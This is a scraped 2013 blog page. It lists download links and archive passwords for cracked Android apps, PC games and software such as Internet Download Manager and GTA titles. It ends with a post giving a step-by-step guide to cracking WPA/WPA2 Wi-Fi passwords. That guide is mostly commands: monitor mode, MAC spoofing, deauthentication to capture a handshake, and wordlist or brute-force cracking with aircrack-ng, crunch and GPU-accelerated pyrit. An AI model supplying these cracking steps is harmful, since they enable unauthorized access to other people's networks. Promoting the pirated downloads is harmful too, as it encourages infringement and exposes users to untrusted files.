Friday 30 August 2013

Android Applications [01-02-2013] Full Activation

List File :


  1. 4G WiFi BT Signal Speed Boost v3.0-AnDrOiD
  2. Andy (Siri for Android) v5.7-AnDrOiD
  3. aTorrent PRO v2.0.1.4-AnDrOiD
  4. Auto Call Recorder Pro v3.32-AnDrOiD
  5. BetterBatteryStats v1.12 RC5-AnDrOiD
  6. BlueDUN v2.3-AnDrOiD
  7. Business Calendar v1.3.0.2-AnDrOiD
  8. Cloud SMS v2.0.8-AnDrOiD
  9. CM10.1 CM9 TouchWiz 5.0 theme v3.3.8 Android 4.0 Plus (Requires CM10 AOKP Rom)-AnDrOiD
  10. Digital Alarm Clock - Pro v5.4-AnDrOiD
  11. Dream Home v1.1-AnDrOiD
  12. Dynamic Dice (App and Wallpaper) v1.0.5-AnDrOiD
  13. Falcon Pro (for Twitter) v1.4-AnDrOiD
  14. Fast Burst Camera v4.0.3-AnDrOiD
  15. Find My Phone v4.7-AnDrOiD
  16. HD Video Wallpaper Gallery Pro v1.1-AnDrOiD
  17. Holo Launcher HD Plus v2.0.1 Android 4.0 Plus-AnDrOiD
  18. Holo Launcher Plus v2.0.1-AnDrOiD
  19. iPhone Messages 1.24-AnDrOiD
  20. JDownloaderRcPro v1.5.1-AnDrOiD
  21. KeyChord - Piano Chords Scales v2.7-AnDrOiD
  22. Next Launcher HD Theme for Go v3.0-AnDrOiD
  23. Notification Weather Pro v0.6.1 Android 4.1 Plus-AnDrOiD
  24. PicSay Pro - Photo Editor v1.5.0.9b-AnDrOiD
  25. Pocket Girlfriend v1.33-AnDrOiD
  26. Pocketbooth v1.3.1-AnDrOiD
  27. QuickShot HD Camera v2.0.1-AnDrOiD
  28. ROM Manager (Premium) v5.5.1.4-ROOTED DEVICES ONLY-AnDrOiD
  29. Send It Pro v1.3-AnDrOiD
  30. Snap Camera v1.0.005-AnDrOiD
  31. Solar System Explorer v2.5.1-AnDrOiD
  32. Speed Boost Pro v4.1.3-AnDrOiD
  33. Unified Remote Full v2.7.1-AnDrOiD
  34. Unit Converter Plus v1.2.20-AnDrOiD
  35. Vignette v2012.12.4-AnDrOiD
  36. WakeVoice vocal alarm clock v4.0.6-AnDrOiD
  37. Weather Live v1.3-AnDrOiD
  38. Windows 8 for Android v1.6-AnDrOiD

Download

Click Here 


Posted By Unknown 8/30/2013 06:32:00 am

The Typing of the Dead

Download

Click Here 

Posted By Unknown 8/30/2013 06:14:00 am

Typing Master Pro 7.0

Download

Uppit

Swankshare

Password=www.muhammadniaz.net   

Posted By Unknown 8/30/2013 06:02:00 am

Thursday 29 August 2013

Uniblue Driver Scanner

Download

Click Here 

Posted By Unknown 8/29/2013 07:49:00 am

Thursday 22 August 2013

Stronghold Crusader Extreme

Download

Uppit

Uploadbaz 

Swankshare 

Password=www.muhammadniaz.net 

Posted By Unknown 8/22/2013 11:03:00 am

Call of Juarez Gunslinger

Posted By Unknown 8/22/2013 10:52:00 am

Prince of Persia Sands of Time

Download

Uppit

Uploadbaz

Swankshare

Passsword=www.muhammadniaz.net   

Posted By Unknown 8/22/2013 10:32:00 am

Assassin's Creed Revelations

Download

Swankshare

Hugefiles

Password=www.muhammadniz.net  

Posted By Unknown 8/22/2013 10:27:00 am

Counter Strike Carbon

Download

Uppit

Uploadbaz

Swankshare

CD Key=AAA

Password=www.muhammadniaz.net   

Posted By Unknown 8/22/2013 10:20:00 am

GTA IV

Download

Note
This is Torrent Download file. You must be Install ÂµTorrent in your System.


Posted By Unknown 8/22/2013 10:08:00 am

GTA SanAndreas

Download

Uppit

Uploadbaz 

Swankshare 

albafile

Hostingbulk 

Mightyupload 

Password=www.muhammadniaz.net  

Posted By Unknown 8/22/2013 10:02:00 am

GTA Vice City

Download

Click Here

  


Posted By Unknown 8/22/2013 09:50:00 am

GTA Killer City

Download

Uppit

SwankShare

UploadBaz

Password=www.muhammadniaz.net    

Posted By Unknown 8/22/2013 09:41:00 am

Internet Download Manager 6.17 Build 8

Download

Click Here 


Posted By Unknown 8/22/2013 09:25:00 am

Saturday 17 August 2013

HACK WIFI PASSWORD WITH BACKTRACK 5




WARNING :Don't Hack any authorized router,otherwise you'll be put into jail.  


 certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!

 
  •  press enter......go on



  •  At BOOT Menu....just type startx


  • an Now your all set to go...just simply follow below steps...now  



Rules to Follow
    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads
    • I highly recommend you to download backtrck 32 bit version coz it runs smoothly...in win7 64bit through vmware workstation.......... /
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

 Steps to Follow:
Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download
crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the
wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :

pyrit list_cores

Posted By Unknown 8/17/2013 01:02:00 am

We Serve All for Free!